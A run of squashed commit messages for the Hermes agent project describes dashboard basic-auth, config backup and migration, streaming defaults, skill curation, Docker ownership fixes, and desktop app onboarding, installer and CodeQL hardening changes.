A bundled, zero-infrastructure 'just put a password on my dashboard'
provider that uses the supports_password extension point. No external IDP,
no database: sessions are stateless HMAC-signed tokens the provider mints
and verifies itself, and passwords are hashed with stdlib scrypt (no
third-party dependency — deliberately avoids bcrypt to keep the dep
surface unchanged).
- plugins/dashboard_auth/basic: BasicAuthProvider (scrypt verify with a
constant-time dummy-hash path for unknown users so the endpoint is not
a username-timing oracle; access/refresh tokens carry a 'kind' claim
that verify/refresh enforce; cross-secret tokens are rejected). The
register() entry point mirrors the Nous plugin's config/env precedence
(env wins; empty treated as unset) and LAST_SKIP_REASON channel.
- config.py: document the canonical dashboard.basic_auth.* surface
(username / password_hash / password / secret / session_ttl_seconds).
Activates only when username + (password or password_hash) are set, so
OAuth users and loopback/--insecure operators are unaffected. Without an
explicit secret a random per-process key is generated (logged): fine for a
single process, but sessions then don't survive restart or span workers.
* Port from google-gemini/gemini-cli#21541: back up corrupted config.yaml
When config.yaml fails to parse, load_config() silently falls back to
DEFAULT_CONFIG and leaves the broken file on disk. If the user then re-runs
the setup wizard or hermes config set (both rewrite config.yaml), their
broken-but-recoverable overrides are lost for good.
Adapts the policy-file recovery from gemini-cli#21541: on the first parse
warning for a given broken file, snapshot it to config.yaml.corrupt.<ts>.bak
(best-effort, symlink-guarded, size-deduped) and tell the user where it
landed. Unlike Gemini's version we deliberately do NOT reset config.yaml to a
clean state — hermes never silently mutates user config, and leaving it means
a hand-fixed file is re-read on the next load.
Tests: 3 new cases (backup created + content preserved + original untouched;
same-size backup dedup; symlink not copied). E2E verified with isolated
HERMES_HOME and a real tab-indented broken config.
* feat(dashboard): add Debug Share to the System page
Surface `hermes debug share` in the dashboard. The System > Operations
section gets a dedicated card that uploads a redacted report + full logs
and returns the paste URLs as real, copyable links instead of a log tail.
- debug.py: factor a pure build_debug_share() returning structured
{urls, failures, redacted, auto_delete_seconds}; run_debug_share now
calls it (CLI output unchanged).
- web_server.py: POST /api/ops/debug-share runs the share core in a
worker thread and returns the structured payload synchronously (the
URLs are the whole point — not a backgrounded action).
- api.ts: runDebugShare() + DebugShareResponse.
- SystemPage.tsx: share card with a redaction toggle (on by default),
per-link + copy-all buttons, and the 6h auto-delete countdown.
- tests: build_debug_share core + endpoint (redact toggle, failure 502,
token gate).
Salvage of #35508 (@dchenk), rebased onto current main. Resolved the
tests/tools/test_stage2_hook_puid_pgid.py conflict (kept both the
envdir-creation regression test on main and the new config-migration
tests).
Docker image upgrades replace code under $INSTALL_DIR but preserve
$HERMES_HOME on the mounted volume, so the persisted config.yaml never
received the schema migrations that non-Docker `hermes update` runs
(#35406). This adds scripts/docker_config_migrate.py, invoked from
stage2-hook after first-boot seeding and before gateway services start:
it backs up config.yaml + .env, runs migrate_config(interactive=False),
and honors HERMES_SKIP_CONFIG_MIGRATION=1 for manual control.
Also fixes a latent bug in check_config_version(): it called load_config()
which deep-merges DEFAULT_CONFIG, so a legacy config with no raw
_config_version falsely reported as already-current. It now reads the raw
on-disk file so legacy configs are correctly detected for migration.
Differs from #35508 as submitted (Option B cleanup): dropped the
`_config_version` line added to cli-config.yaml.example and removed the
accompanying test_cli_config_example_declares_latest_version change-detector
test. The example is a copy-template and has no business asserting a schema
version; check_config_version() reads the user's real config.yaml, not the
example. This removes a second sync point that drifts on every version bump.
Closes#35508. Fixes#35406.
Co-authored-by: Dmitriy Cherchenko <17372886+dchenk@users.noreply.github.com>
* fix(doctor): detect + repair stale HERMES_MAX_ITERATIONS .env ghost shadowing config.yaml
hermes doctor now flags when ~/.hermes/.env carries a HERMES_MAX_ITERATIONS
value that disagrees with agent.max_turns in config.yaml, and 'hermes doctor
--fix' removes the stale .env line so config.yaml is authoritative. 'hermes
config show' surfaces the same drift inline under Max turns.
The setup wizard stopped dual-writing this value, but users who edited only
config.yaml from a pre-fix install keep a .env ghost. The gateway bridge
normally overrides it at startup, but if the bridge bails on any earlier
config-parse error the ghost silently wins — config says 400 while the
gateway activity line reads N/90.
The detector reads the .env FILE directly (load_env), not get_env_value/
os.environ, since the startup bridge may already have overwritten os.environ
with the config value.
Closes#17534.
* fix(config): stop offering HERMES_MAX_ITERATIONS as an editable env var
Removes HERMES_MAX_ITERATIONS from OPTIONAL_ENV_VARS so the dashboard env
editor (PUT /api/env) and any env-var prompt no longer let a user write it
to .env — which would recreate the stale ghost that shadows config.yaml's
agent.max_turns (issue #17534). The iteration budget is configured only via
config.yaml; the env var stays a read-only backward-compat fallback in the
gateway/CLI, never a promoted write target.
Regression test asserts it is absent from OPTIONAL_ENV_VARS.
Add `display.interface` config key so users can make the modern TUI the
default for bare `hermes` / `hermes chat` without exporting HERMES_TUI=1 in
every shell. Default stays "cli" to preserve current behavior.
Add a `--cli` flag (mirrors `--tui`) so an explicit invocation can force the
classic prompt_toolkit REPL even when `display.interface: tui` is configured.
Precedence (highest first): `--cli` > `--tui`/`HERMES_TUI=1` > config
`display.interface` > classic REPL. Two resolvers enforce it:
* `_resolve_use_tui(args)` — the args-aware resolver used by `cmd_chat`
and the Termux fast-TUI path (uses full load_config()).
* `_wants_tui_early(argv)` — a dependency-free early resolver used by
mouse-residue suppression and the Termux fast paths, which run before
argparse / hermes_cli.config are importable (minimal cached YAML read).
Both `--cli` and `--tui` are registered via `_inherited_flag`, so they are
carried across self-relaunch automatically.
- config: add display.interface ("cli" default), bump _config_version 25->26.
The generic missing-field migration + load_config() deep-merge seed the key
for existing configs; no bespoke migration block needed.
- docs: document --cli flag and display.interface in cli-commands.md and
the TUI user guide.
- tests: new test_default_interface_resolution.py covering resolver
precedence at every layer, early resolver edge cases (missing/garbage
config), parser flags, and relaunch inheritance.
Streaming quality differs sharply by platform: Telegram has native animated
draft streaming (sendMessageDraft) which is smooth, while Discord/Slack only
have edit-based streaming (repeated editMessage) which visibly flickers. Ship
defaults that match reality instead of one global flag.
- hermes_cli/config.py: DEFAULT_CONFIG display.platforms now ships
telegram.streaming=true and discord.streaming=false (was empty {}). These
are gap-fillers — config deep-merge has user values win, so anyone who
explicitly sets discord.streaming=true keeps it. The global
streaming.enabled master switch still gates everything; these per-platform
flags only take effect once streaming is on.
- Dashboard exposure comes for free: the web settings schema is generated
from DEFAULT_CONFIG, so display.platforms.telegram.streaming and
.discord.streaming now surface as editable boolean toggles in the UI with
no frontend change. (Previously the per-platform tree was {} and invisible.)
- tests: pin the defaults, the resolver outcome (telegram on / discord off /
unlisted platforms follow global), user-override-wins, and dashboard schema
exposure.
No _config_version bump: deep-merge fills the gap for existing installs; no
value migration needed.
The gateway reads top-level streaming.* with StreamingConfig defaults when the
block is absent, so streaming was invisible — a user with no streaming block
sees responses arrive as single messages and has no way to discover the toggle
short of reading source. This materializes the block in config.yaml so it's
discoverable, with values byte-identical to the dataclass defaults (no behavior
change).
- DEFAULT_CONFIG gains a root-level streaming block (enabled, transport,
edit_interval, buffer_threshold, cursor, fresh_final_after_seconds), each
documented inline. Values match gateway/config.py StreamingConfig() exactly.
- _KNOWN_ROOT_KEYS gains 'streaming' so the validator accepts the root key.
- No _config_version bump: load_config deep-merges DEFAULT_CONFIG over user
YAML, so existing installs pick up the default automatically; no value
migration needed.
Does NOT touch the setup wizard — streaming stays opt-in, just discoverable.
Two related changes to the skill curator:
1. Built-in pruning. New curator.prune_builtins config (default on) lets the
curator archive bundled built-in skills after the inactivity period, not
just agent-created ones. A .curator_suppressed list tells the update-time
re-seeder (tools/skills_sync) to leave pruned built-ins archived, so the
prune is durable across `hermes update`. Built-ins are seeded with a
baseline record on first sight, so the inactivity clock starts at upgrade
time -- no mass-prune on the first run. Hub-installed skills are never
pruned regardless of the flag. Restoring a built-in clears its suppression.
2. Usage tracking for all skills. Telemetry (view/use/patch) was wrongly gated
behind curation-eligibility, so built-ins were tracked only when prunable
and hub skills never. Telemetry is observability and is now decoupled from
curation: every skill accrues usage counts regardless of provenance, while
lifecycle mutators (set_state/set_pinned/mark_agent_created) stay
curation-gated. New usage_report() + provenance() expose all skills with an
agent/bundled/hub tag.
Fixes#34107. When Hermes runs in Docker with HERMES_UID=1000 /
HERMES_GID=911, the entrypoint chowns the top-level HERMES_HOME once
at startup — but subdirectories created at runtime by
ensure_hermes_home() (especially for profile namespaces under
profiles/<name>/ spawned by kanban workers) were landing as root:root
and blocking subsequent uid-mapped worker invocations with:
PermissionError: [Errno 13] Permission denied:
'/opt/data/profiles/charles/logs/curator'
Fix: add _resolve_hermes_uid_gid + _chown_to_hermes_uid helpers that
read the env vars and apply chown after mkdir. Invoke from _secure_dir
which already runs after every directory creation in the home-init path,
so all newly-created subdirs (including the profile namespaces) get the
right ownership.
Safety properties:
- No-op when HERMES_UID/HERMES_GID unset (the dominant non-Docker path)
- No-op on Windows (os.chown doesn't exist; AttributeError swallowed)
- No-op when running as non-root (EPERM swallowed — the entrypoint's
startup chown -R picks it up on next restart, and in most cases the
dir was already correctly-owned by the calling user)
- Uses -1 sentinel for missing field so only the set value applies
- Empty-string env vars treated as unset
Adds 14 tests across:
- TestResolveHermesUidGid (7) — env-var parsing
- TestChownToHermesUid (5) — chown helper invariants
- TestSecureDirChown (2) — end-to-end through _secure_dir
Co-authored-by: Cursor <cursoragent@cursor.com>
* feat: better composer etc
* docs: add desktop and dashboard run instructions
* fix(desktop): address security scan findings
* fix(dashboard): resolve @nous-research/ui path under npm workspaces
The sync-assets prebuild step shelled out to 'cp -r
node_modules/@nous-research/ui/dist/fonts ...' with a path relative
to apps/dashboard/. That works only when the dep is installed
locally in the dashboard workspace, but 'npm install' at the repo
root (the documented setup — see apps/desktop/README.md) hoists
shared deps to the root node_modules under npm workspaces. The
relative cp then fails with 'No such file or directory', sync-assets
exits 1, the Vite build aborts, and 'hermes dashboard' surfaces a
generic 'Web UI build failed' message.
Replace the shell one-liner with scripts/sync-assets.cjs, which
walks up from the dashboard directory looking for node_modules/
@nous-research/ui — working in both the hoisted (workspaces) and
co-located (standalone) layouts. Also guards against a missing
dist/fonts or dist/assets with a clearer error pointing at a
rebuild of the UI package rather than silently copying nothing.
* feat(desktop): support connecting to a remote Hermes backend
Add HERMES_DESKTOP_REMOTE_URL and HERMES_DESKTOP_REMOTE_TOKEN env
vars that, when set, short-circuit the local-child spawn in
startHermes() and connect the Electron renderer to an already-
running 'hermes dashboard' server reachable over the network.
Motivating use case: WSL2 users who want to run the Hermes core
(agent loop, tools, filesystem access) inside their WSL
distribution while rendering the Electron GUI on native Windows.
Before this change, the desktop app always spawned a local Python
child on the same host as the renderer, which doesn't cross the
WSL/Windows boundary.
The remote path reuses waitForHermes() as a liveness probe
(/api/status is in the backend's public endpoint allowlist), so
the connection is only returned once the backend is actually
ready. WebSocket URL derivation picks ws:// or wss:// based on
the input scheme. URL validation rejects non-http(s) schemes and
requires both env vars together to avoid a half-configured
connection that would silently fall through to the spawn path.
No behaviour change when the env vars are unset — the default
local-spawn flow is untouched.
Typical usage:
# in WSL2
hermes dashboard --tui --no-open --host 0.0.0.0 --port 9119 --insecure
# on Windows
set HERMES_DESKTOP_REMOTE_URL=http://localhost:9119
set HERMES_DESKTOP_REMOTE_TOKEN=<session token>
set HERMES_DESKTOP_IGNORE_EXISTING=1
(launch Hermes desktop)
* ci(desktop): automate desktop releases
Add GitHub Actions release channels for signed desktop installers and document the stable/nightly download paths.
* feat: file tabs
* refactor(desktop): tighten right-rail tab close API
Promote closeRightRailTab/closeActiveRightRailTab as the single
public entry point. Drops the activeTabRef + handleCloseDocument
indirection in ChatPreviewRail, the unused $rightRailHasContent
atom, and the legacy dismissFilePreviewTarget alias. -70 LOC.
* feat(desktop): polish composer pill toward reference look
Solid foreground-on-background send/voice-conversation circle (black-on-white
in light, white-on-black in dark) anchors the right edge as the primary CTA
instead of the orange theme primary. Bumps the primary control to 2.125rem so
it visually outranks the ghost mic/plus controls. Opens up the surface padding
(0.625rem x / 0.5rem y) so the input row breathes around its controls, and
nudges the corner radius from 20 to 24px for a slightly pill-ier silhouette.
LiquidGlass distortion is preserved.
* feat(desktop): add startup and onboarding flow
Add phase-based desktop boot progress, fresh-install sandbox testing, and first-run provider credential onboarding so packaged installs can start cleanly without manual settings detours.
* fix(desktop): gate prompts on provider setup
Show the desktop provider onboarding flow before prompt submission when no inference provider is configured, preventing fresh installs from falling through to backend credential errors.
* fix(desktop): surface provider onboarding from session warnings
Propagate credential warnings through session runtime info and open desktop onboarding whenever a session reports no usable provider, so unconfigured installs cannot fall through to prompt errors.
* fix(desktop): route gateway provider errors to onboarding
The "No inference provider configured" auth error reaches the renderer through gateway error events, not the prompt.submit promise; the previous patch only caught the latter, so the error toast still surfaced and onboarding never opened.
Also strip credential-shaped env vars from the test:desktop:fresh sandbox so the packaged backend can't see provider keys leaking from the launching shell.
* fix(desktop): use strict runtime check to drive onboarding
setup.status returned True whenever any provider auth state was discoverable, including indirect fallbacks like a gh-CLI Copilot token. That made desktop think the user was set up while the agent's actual resolve_runtime_provider call still raised AuthError, leaving the user with a useless toast and no onboarding.
Add a setup.runtime_check gateway method that runs the same resolver the agent uses on session creation, and switch the desktop onboarding overlay and prompt precheck to use it.
* feat(desktop): OAuth-first onboarding using existing dashboard provider API
Replace the engineer-flavored API key form with a Sign-in-first onboarding overlay that uses the dashboard's existing /api/providers/oauth catalog and PKCE/device-code endpoints (Anthropic, Nous, OpenAI Codex, etc.). API key entry is now a fallback tab with friendly provider names instead of env var prefixes, and the loud raw resolver error is gone in favor of a one-line welcome message.
* fix(desktop): polish onboarding provider list
Reorder OAuth providers so Nous Portal is first, give the segmented Sign in / API key control equal column widths, and replace the engineer-flavored backend names like "Anthropic (Claude API)" / "MiniMax (OAuth)" with friendlier in-app titles. External-CLI providers now show a softer subtitle and an external-link icon instead of a chevron.
* refactor(desktop): split onboarding overlay into store + view
Move the OAuth state machine, runtime check, copy-to-clipboard, and api-key save into store/onboarding.ts (matching the boot.ts pattern), leaving the overlay as a presentation layer that subscribes via useStore. Tabs are now table-driven, child panels read flow from the store instead of prop-drilling, and the polling/PKCE/error/success branches share a small Status atom.
* fix(desktop): external CLI providers + center mode tabs
External-CLI providers (Claude Code, Qwen Code) now open an in-overlay panel with the CLI command, copy button, and an "I've signed in" recheck instead of firing an invisible toast. Center the Sign in / API key tab control so it sits under the heading instead of hugging the left edge.
* fix(desktop): drop onboarding tabs for an inline link, group device-code waiting state
Replace the Sign in / API key tab pair with an "I have an API key" footer link under the OAuth provider list, with a "Back to sign in" affordance inside the API key form. Group the device-code "Waiting for you to authorize..." status next to the Cancel button so the alignment matches the action.
* refactor(desktop): tighten onboarding store + overlay
Drop the dead isOnboardingBusy/BUSY set, factor the catch-fallback dance into safeReq, and share a single reloadAndConnect helper between PKCE submit, device-code success, external recheck, and api-key save.
In the overlay, extract Step / CodeBlock / FlowFooter / CancelBtn / DocsLink atoms so the four sign-in panels share the same chrome instead of repeating it inline. Net effect: fewer literal divs, one place to touch the spacing, and the code-block + footer rows are reusable across future flows.
* fix(desktop): mount onboarding from frame 1 to kill the FOUT
Default onboarding.configured to null (unknown until the runtime check resolves) and have the onboarding overlay render whenever it's not yet confirmed true. The boot overlay now yields to it, so the very first paint is the Welcome card with a "While we get you set up..." progress strip instead of a flash of the chat shell between boot dismiss and onboarding mount.
The picker swaps in cleanly once the gateway opens and the runtime check confirms the user is not configured. Already-configured users see the same prep card briefly while their existing runtime warms up, then the overlay dismisses without touching the chat shell.
* fix(desktop): top-align empty sessions placeholder
The "Start a chat to build your history." empty state used a min-h-35 grid place-items-center container, which floated the text in a tall dead zone. Render it as a flat paragraph that sits right under the section header like the empty pinned state does.
* refactor(desktop): drop dead boot overlay
Onboarding overlay subsumes the boot card now that it mounts from frame 1 and renders boot progress inline. The standalone DesktopBootOverlay is unreachable in every flow (yields whenever onboarding has not confirmed configured, dismisses once it has).
* fix(desktop): hide pinned/recents sections until first session
A fresh sidebar showed the Pinned and Recent chats headers with floating empty-state copy underneath. Drop both sections (and the now-orphan SidebarEmptySessionState) when there are no sessions yet — they reappear after the first chat. Skeletons during initial load are unchanged.
* feat(gui): route embedded TUI through dashboard gateway (#21979)
Inject HERMES_TUI_GATEWAY_URL into dashboard PTY sessions so embedded ui-tui instances attach to the in-process websocket gateway, with coverage for the new env wiring.
* Add desktop remote gateway settings
Make the desktop gateway connection configurable from settings so local remains the default while remote backends can be saved, tested, and applied without environment variables.
* feat(gui): first-class Messaging page + gateway menu redesign
- Add Messaging page to the desktop app with per-platform setup,
status, and inline guidance. Catalog derives from gateway.config
Platform enum + plugin registry, so every messaging adapter the CLI
supports (Telegram, Discord, Slack, Mattermost, Matrix, WhatsApp,
Signal, BlueBubbles, Home Assistant, Email, SMS, DingTalk, Feishu,
WeCom, Weixin, QQ, Yuanbao, API server, Webhooks, plugins) shows up
without per-platform code.
- New REST endpoints: GET /api/messaging/platforms, PUT and POST
/test on the same path. Secrets go through the existing .env
pipeline; enable/disable writes config.yaml.
- Replace gateway statusbar dropdown with a richer panel: status row,
icon-only restart + system-panel actions, recent activity (with
timestamps trimmed in display, full text on hover), platform list.
- Auto-poll the messaging page every 6s (paused when hidden) so
status updates without a manual check.
- Drop Settings / Command Center from the sidebar nav (still
reachable via shortcuts and the titlebar cog).
- Flatten top corners on Messaging/Skills/Artifacts/Chat panes.
- Share new StatusDot component across messaging + gateway menu.
- Fix gateway/config.py so an explicit platforms.<name>.enabled=false
in config.yaml is honored when env tokens are present.
- pb-9 on the chat content area for breathing room above the composer.
* Potential fix for pull request finding 'CodeQL / Clear-text logging of sensitive information'
Co-authored-by: Copilot Autofix powered by AI <62310815+github-advanced-security[bot]@users.noreply.github.com>
* pin electron version
* hide application menu on non-mac systems
* interpret compactPreview for non-string vlaues as JSON or an empty string
* fix(desktop): keep composer contenteditable mounted across stacked toggle
The composer rendered {input} inside two different parent fragments
depending on `stacked`. When auto-expand flipped `stacked` (e.g. the
moment typed text wrapped past two lines), React reconciled the two
branches as different positions and unmounted/remounted the
contenteditable. The fresh mount started empty, so any in-flight
characters — most reliably reproduced by holding a key — were lost.
Replace the conditional with a single CSS Grid whose template-areas
swap on `stacked`. The three children (menu, input, controls) keep
stable identities across the toggle; only their grid placement
changes, which the browser handles without React tearing down the
editor.
* refactor(desktop): align install layout with install.ps1 / install.sh
Make the desktop app's runtime layout match what scripts/install.ps1 and
scripts/install.sh produce, so a desktop-only user and a CLI-only user end
up with the same files in the same places and can share one install.
Layout
- ACTIVE_HERMES_ROOT = HERMES_HOME/hermes-agent (was: process.resourcesPath/hermes-agent, read-only)
- VENV_ROOT = HERMES_HOME/hermes-agent/venv (was: userData/hermes-runtime)
- desktop.log = HERMES_HOME/logs/desktop.log (was: userData/desktop.log)
- HERMES_HOME default: %LOCALAPPDATA%\hermes on Windows, ~/.hermes elsewhere
The packaged .app/.exe still ships a read-only payload at
process.resourcesPath/hermes-agent (FACTORY_HERMES_ROOT). On first launch
or after an installer-driven upgrade we sync factory -> active, then
provision the venv and run pip install -e . against the active root.
Key behaviors
- Pin HERMES_HOME in the spawned Python's env so get_hermes_home() resolves
to the same path resolveHermesHome() picked. Without this, Python falls
back to ~/.hermes on every platform - fine on mac/linux, a split-state
bug on Windows where our default is %LOCALAPPDATA%\hermes.
- Detect developer installs by .git presence at ACTIVE; never overwrite
a user's checkout via factory sync.
- Marker at ACTIVE/.hermes-desktop-runtime.json (schema v4) tracks
pyproject hash + factory version + runtime schema version. depsFresh
fast-paths when nothing changed.
- Dev (npm run dev) prefers SOURCE_REPO_ROOT over ACTIVE so devs run
their local edits, not whatever's under HERMES_HOME.
- Better error messages distinguish "no payload" from "no Python".
- Preserve a legacy ~/.hermes on Windows when no %LOCALAPPDATA%\hermes
exists, so users with prior pip/manual installs aren't orphaned.
pyproject.toml
- Promote fastapi, uvicorn[standard], ptyprocess (non-Windows), and
pywinpty (Windows) to main dependencies. The dashboard backend
(hermes dashboard) needs them at runtime; the previous lazy-import
fallback was a footgun for fresh installs.
- Empty the [pty] optional-extra; kept as a no-op back-compat alias for
any existing pip install hermes-agent[pty] invocations.
Drops the hardcoded BUNDLED_RUNTIME_REQUIREMENTS list in main.cjs - the
desktop now installs whatever pyproject.toml says, single source of truth.
Files
- apps/desktop/electron/main.cjs: runtime layout, HERMES_HOME pin,
factory->active sync, marker v4
- apps/desktop/scripts/test-desktop.mjs: track new venv location
- apps/desktop/README.md: new Setup, Runtime Bootstrap, and
Debugging sections
- pyproject.toml: fastapi/uvicorn/pty backends in main
dependencies; [pty] extra emptied
Tested locally on Windows: npm run dev boots cleanly, sessions land at
the new location, type-check + lint + test:desktop:platforms all pass.
Verified end-to-end on a fresh Win11 VM via dist:win installer.
Known gaps (filed as follow-ups, not in this PR):
- Skills not seeded on packaged installs (sync_skills only runs in
cmd_chat, not cmd_dashboard). Need to move to shared pre-dispatch.
- Git Bash not bundled or detected; agent's terminal tool errors out
with a useful message but desktop bootstrapper should pre-flight it.
- install.ps1 / install.sh should be decomposed into composable phase
libraries so the desktop bootstrapper can reuse them as a single
source of truth across all install surfaces.
* feat(desktop): theme polish, prose chat typography, composer chrome
- DS tokens/midground, Backdrop, scoped scrollbars, typography plugin + prose
- Composer liquid/radius utilities, thread font parity, tool/thinking cues
- File tree label scale, preview flex, thread retry loading + streaming tests
* feat(desktop): NSIS prereq detection page + auto-install via winget
The packaged Windows installer now detects Python 3.11+ and Git for Windows
at install time and offers to install missing prereqs via winget. Mirrors
the prereq logic scripts/install.ps1 already runs for CLI installs, so
desktop installer users get the same out-of-the-box experience as
install.ps1 users.
Why
- Hermes' terminal tool calls bash.exe directly (tools/environments/
local.py); on Windows that's Git Bash from Git for Windows. Without it,
the agent fails on the first terminal() call.
- Hermes' Python runtime needs 3.11+. Without it, the desktop bootstrapper
errors out at venv creation.
- Both gaps surfaced on a fresh Windows 11 VM smoke test: VM had Python
pre-installed but no Git, so the agent's first terminal call failed
with "Git Bash isn't installed."
- install.ps1 has had Install-Git + Install-Uv functions for ages. The
desktop installer was the asymmetric outlier.
How — NSIS prereq page
- New file: apps/desktop/installer/prereq-check.nsh (plugged into
electron-builder via build.nsis.include)
- Real Wizard page using nsDialogs, inserted via customPageAfterChangeDir
hook (between the Directory page and InstFiles).
- Group boxes for Python and Git, each showing detection status.
- Pre-checked install checkboxes when winget is available.
- Auto-skips silently if both prereqs are already installed.
- Falls back to manual download URLs when winget itself is missing.
- Detection:
- Python: probes `py -3.11`/`-3.12`/`-3.13`/`-3.14` via the Python
launcher. Microsoft Store "Python stub" (no py.exe) is correctly
classified as not-installed.
- Git: `where git`.
- winget: `where winget` (Win10 1809+ / Win11 with App Installer).
- Install execution (in customInstall macro):
- Python: nsExec::ExecToLog with `--scope user --silent`. Per-user
install, no UAC prompt, output streams to install log.
- Git: ExecShellWait via Windows ShellExecute. Critical because Git
always installs per-machine and triggers UAC; ShellExecute preserves
the foreground focus chain across non-elevated → elevated process
spawns, so UAC actually comes to the foreground. nsExec::ExecToLog
breaks the chain because winget runs hidden.
- Both pass `--disable-interactivity --accept-package-agreements
--accept-source-agreements` to suppress winget's own dialogs.
- Verification: probes Git's standard install locations via FileExists
rather than `where git`. NSIS's process inherits PATH at startup, so
a freshly-installed Git won't be visible to `where` until restart.
- Silent installs (/S) skip the prompts; managed deploys handle prereqs
out-of-band via Group Policy / Intune.
How — Electron-side safety net
- New findGitBash() in main.cjs, parallel to findSystemPython(). Probes
the same locations as tools/environments/local.py:_find_bash() so a
positive result here means the agent's terminal tool will work.
- ensureRuntime now throws a clear, actionable error on Windows when Git
Bash isn't found, matching the existing "Python 3.11+ is required"
error path.
- Catches users the NSIS page doesn't: .msi installer users (NSIS prereq
page doesn't run for MSI), `npm run dev` users, manual installers,
anyone who unchecked the install boxes on the NSIS prereq page.
- All gated on `IS_WINDOWS`; macOS / Linux unaffected.
NSIS build issue (resolved)
- electron-builder defaults to `-WX` (warnings as errors). NSIS optimizer
emits "warning 6010: function not referenced" for our page functions
because Page custom directives don't count as references in its
static-analysis pass. The functions ARE called at runtime when NSIS
invokes the page; the optimizer just can't see it statically.
- Set `build.nsis.warningsAsErrors=false` in package.json so this
spurious warning doesn't fail the build. (Documented option from
electron-builder's nsisOptions.)
Out of scope (filed for future work)
- MSI prereq detection: Windows Installer custom actions are a different
mechanism. Enterprise deploys typically handle prereqs via GP/Intune.
- Bundle PortableGit + python-build-standalone in extraResources for
zero-network installs. ~80MB increase.
- Mac / Linux GUI prereq flows (different installer formats; Xcode CLT
covers most macOS prereqs already; Linux is per-distro hard).
Files
- apps/desktop/installer/prereq-check.nsh (new, ~290 lines NSIS)
- apps/desktop/package.json (build.nsis.include +
warningsAsErrors)
- apps/desktop/electron/main.cjs (findGitBash + preflight)
- apps/desktop/README.md (Runtime prerequisites
section)
Cross-platform impact
- macOS / Linux builds (dist:mac, dist:mac:dmg, dist:mac:zip): nsis
config is ignored entirely; .nsh is dormant.
- npm run dev: .nsh dormant; main.cjs preflight gated on IS_WINDOWS.
- scripts/install.ps1, scripts/install.sh: no reference to any new
files; CLI install paths untouched.
- Hermes CLI / dashboard / gateway: no reference; runtime untouched.
- All checks: node --check on main.cjs and test-desktop.mjs pass;
npm run test:desktop:platforms 4/4 passing; node --test green.
Tested
- npm run dist:win produces signed .exe and .msi without errors.
- Fresh Win11 VM (Python pre-installed, no Git): prereq page renders,
Python check shows detected, Git checkbox pre-checked. Click Next →
Git installs via winget with UAC prompt in foreground.
- After install completes, Hermes launches and the agent's terminal
tool can run bash commands. Verified Git Bash is detected at
`C:\Program Files\Git\bin\bash.exe` by ensureRuntime's preflight.
* feat: theme changes, composer tweaks, in app update ux, finesse
* fix(cli): seed bundled skills on dashboard + gateway entrypoints
`sync_skills(quiet=True)` was only being called from inside `cmd_chat`,
which meant `hermes dashboard` (the desktop GUI's backend) and `hermes
gateway` (Telegram/Discord/Slack/etc daemons) never seeded the bundled
skill library into ~/.hermes/skills/.
This surfaced as "No skills found" in the desktop GUI's skills panel on
fresh installs, despite the agent having access to the full bundled
library when invoked via `hermes chat`. scripts/install.ps1 worked
around it by running skills_sync.py as part of Copy-ConfigTemplates,
but that's not part of the desktop installer's bootstrap chain.
Fix
- Extract the skills-sync block from cmd_chat into a module-level
`_sync_bundled_skills_quietly()` helper.
- Call the helper from cmd_chat (preserving existing behavior),
cmd_dashboard (after the --status/--stop early-return paths and
fastapi import check, so we don't run skills_sync on management
commands or when deps aren't installed), and cmd_gateway.
Why these three entrypoints
- cmd_chat: the user's primary CLI entrypoint
- cmd_dashboard: the desktop GUI's backend; this is what `hermes
dashboard --tui` invokes when the desktop bootstrapper spawns Hermes
- cmd_gateway: long-running daemons where the user expects the agent
to have full skill access
Other entrypoints (cmd_config, cmd_doctor, cmd_login, cmd_status,
etc.) are management commands that don't need skill discovery and were
never running skills_sync in the first place — leaving them alone.
Idempotence
- tools/skills_sync.py is manifest-based: skipped skills cost
milliseconds. Calling it from multiple entrypoints adds no real
cost, and users running `hermes chat` then `hermes dashboard` get
two fast no-ops on the second call.
Failure handling
- Helper wraps skills_sync in try/except. Skills are an enhancement,
not a hard dependency — Hermes runs fine with an empty skills/ dir.
Files
- hermes_cli/main.py:
+ new helper `_sync_bundled_skills_quietly()` at module level
+ cmd_chat: replace inline block with helper call
+ cmd_dashboard: add helper call after fastapi import succeeds
+ cmd_gateway: add helper call before delegating to gateway_command
* feat(desktop): hoisted todo widget, JSON tool summaries, history grouping & timer fixes
- Hoist todo to first-class widget (shadcn checkboxes, brand colors, no
tool-accordion). Header derives label from active task; non-active rows fade.
- Replace raw JSON dumps with structured key/value summaries via
formatToolResultSummary; nested error extraction for clearer failures.
- Fix loaded-session grouping: stitch interleaved assistant/tool iterations
into one bubble instead of orphaned synthetic messages.
- Stable tool/thinking timers via keyed registry so unmount/scroll doesn't
reset elapsed counts; gate "running" on real live thread state.
- Reorganize chat-only assistant-ui components under components/chat/.
* fix(desktop): address CodeQL alerts on PR #20059
- settings/helpers.ts: harden setNested against prototype pollution.
POLLUTING_PATH_PARTS check is now applied at every assignment site
(loop + leaf) and uses Object.defineProperty so CodeQL can see the
guard inline rather than via a helper function call.
- lib/markdown-preprocess.ts: rebuild the dangling-fence close regex
from a fence-char + length instead of marker.replace(...). The marker
is captured by `(`{3,}|~{3,})` so it can only be backticks or tildes,
but CodeQL was tracing tainted input text into the RegExp source and
flagging hostname dots from input as part of the pattern (false
positive js/incomplete-hostname-regexp on the test fixture URLs).
Reconstructing from a literal char breaks the dataflow.
- scripts/notarize-artifact.cjs: drop args from the run() rejection
message. Args carry --key-id / --issuer / key file path; the existing
outer catch already squashes errors to a generic line, but CodeQL was
flagging the args.join(' ') as clear-text logging of APPLE_API_KEY_ID.
Composer DOM-text-as-HTML alerts (composer/index.tsx:379, :547) are
already addressed in 4dd9732a9 — innerHTML assignment was replaced with
renderComposerContents which builds DOM via replaceChildren / append
text nodes (no HTML interpretation).
* fix(desktop): inline prototype-pollution guard so CodeQL sees it
CodeQL's dataflow doesn't follow the helper-function guard inside
`safeSet`, so it kept flagging Object.defineProperty as prototype-
polluting. Inline the literal `__proto__`/`constructor`/`prototype`
check at the assignment site to break the dataflow.
Behavior unchanged — same set of disallowed keys, same throw.
* feat(ui-tui): resolve links to readable page titles
Mirror desktop pretty-link behavior in the TUI by resolving HTTP links to page titles with shared caching and safe fetch filters, plus slug-based fallbacks so chat links stay readable even when title fetch fails.
* fix(desktop): drop RegExp from dangling-fence close detection
Previous attempt tried to break the dataflow by reconstructing the
close-fence regex from a literal char + marker.length, but CodeQL still
traced marker.length back to input and kept flagging the test-fixture
URLs as hostname-regex sources (js/incomplete-hostname-regexp).
Replace `new RegExp(...)` + `closeRe.test(body)` with a string-only
hasCloseFenceLine() helper that splits on '\n' and uses ===. No regex
on this path now, so input data can no longer reach a RegExp source.
